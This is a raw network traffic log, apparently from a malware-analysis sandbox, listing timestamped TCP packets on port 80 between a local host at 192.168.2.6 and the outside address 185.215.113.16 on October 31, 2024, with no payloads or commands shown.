                                                                            Oct 31, 2024 20:49:30.919168949 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.919677973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.919692039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.919730902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:30.920479059 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.920495987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.920506001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:30.920595884 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.046473026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.046662092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.046674967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.046844959 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.047548056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.047566891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.047590971 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.049474955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.049490929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.049500942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.049520969 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.049547911 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.165442944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.165646076 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.165658951 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.165895939 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.166294098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.166305065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.166332006 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.166963100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.166977882 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.166989088 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.166997910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.167036057 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.284832954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.284987926 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.285001040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.285207987 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.285713911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.285725117 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.285790920 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.287363052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.287378073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.287385941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.287408113 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.287447929 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.404134989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.404227018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.404241085 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.404268980 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.405119896 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.405136108 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.405158043 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.405993938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.406011105 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.406023026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.406037092 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.406065941 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.555376053 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.555799961 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.555814028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.555845022 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.556473970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.556488037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.556529045 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.557291985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.557307005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.557342052 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.558305025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.558322906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.558335066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.558361053 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.558377028 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.642627954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.642775059 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.642787933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.642808914 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.643647909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.643698931 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.796431065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.796602964 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.796614885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.796638012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.800611973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.800625086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.800656080 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.849467039 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.879971027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.879990101 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.880002975 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.880121946 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.913697004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.913836002 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:31.916457891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:31.958966970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.008286953 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.008666039 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.008682966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.008793116 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.086458921 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.086498976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.086514950 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.086606979 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.127087116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.127351999 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.127418995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.127449036 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.127497911 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.205849886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.206038952 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.206056118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.206124067 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.245543003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.245742083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.245763063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.245862961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.245862961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.246171951 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.302627087 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.324659109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.324826002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.324840069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.324872971 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.325329065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.325635910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.364454031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.364635944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.364675999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.364737988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.365009069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.365082979 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.443344116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.443368912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.443654060 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.444201946 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.490180969 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.634563923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.634813070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.634829044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.634902954 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.635628939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.635644913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.635703087 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.636508942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.636527061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.636598110 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.637300968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.637320042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.637398958 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.721322060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.721545935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.721560955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.721628904 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.753248930 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.755800962 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.755965948 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.839895010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.840012074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.840029001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.840110064 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.880748987 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.930354118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.930496931 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.930515051 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.930634975 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.958636999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.958708048 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.958725929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:32.958775043 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:32.958775043 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.049134016 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.049729109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.049743891 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.049825907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.077426910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.077502012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.077605963 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.077621937 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.077678919 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.292448044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.292490005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.292507887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.292596102 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.292805910 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.292840004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.292881012 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.293921947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.293975115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.318523884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.318727016 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.318742990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.318772078 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.365093946 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.418365002 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.418793917 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.418848991 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.434026003 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.434175968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.434190989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.434228897 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.435216904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.435266972 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.554514885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.555131912 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.555146933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.555176973 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.555488110 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.555514097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.555558920 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.599464893 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.673271894 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.673434019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.673455954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.673494101 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.674010992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.674031019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.674072981 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.674793005 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.674855947 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.792088985 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.792397976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.792416096 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.792467117 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.792797089 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.792812109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.792879105 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.793735027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.793813944 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.947473049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.947727919 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.947743893 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.947818995 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.949558973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.949573994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.949608088 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.950874090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.950890064 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.950902939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:33.950926065 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:33.951153994 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.054785967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.054961920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.054977894 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.055075884 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.055497885 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.055520058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.055610895 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.056291103 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.056308031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.056407928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.057360888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.057423115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.173441887 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.173584938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.173602104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.174016953 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.174211025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.174237013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.174282074 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.174961090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.174976110 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.175051928 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.175795078 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.175864935 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.292237043 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.292360067 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.292376995 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.292454004 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.292912006 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.292953968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.293015003 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.293752909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.293770075 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.293795109 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.294277906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.294291019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.294368029 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.411577940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.411603928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.411619902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.411726952 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.412039042 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.412053108 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.412120104 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.412924051 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.412939072 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.413120031 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.413897038 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.414011955 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.454200029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.454303980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.454463005 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.530263901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.530359030 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.530375004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.530447006 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.530860901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.530877113 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.530910969 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.531488895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.531505108 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.531518936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.531558037 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.531558037 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.532154083 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.584218025 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.642235994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.642400980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.642416000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.642463923 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.648654938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.648735046 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.648840904 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.648855925 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.648926973 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.649389982 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.649405956 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.649497032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.650880098 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.651067972 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.651130915 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.651396990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.651412010 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.651458025 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.765940905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.766133070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.766149998 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.766604900 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.767472029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.767674923 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.768435955 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.768704891 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.768718004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:34.768719912 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:34.768738031 CET8049749185.215.113.16192.168.2.6
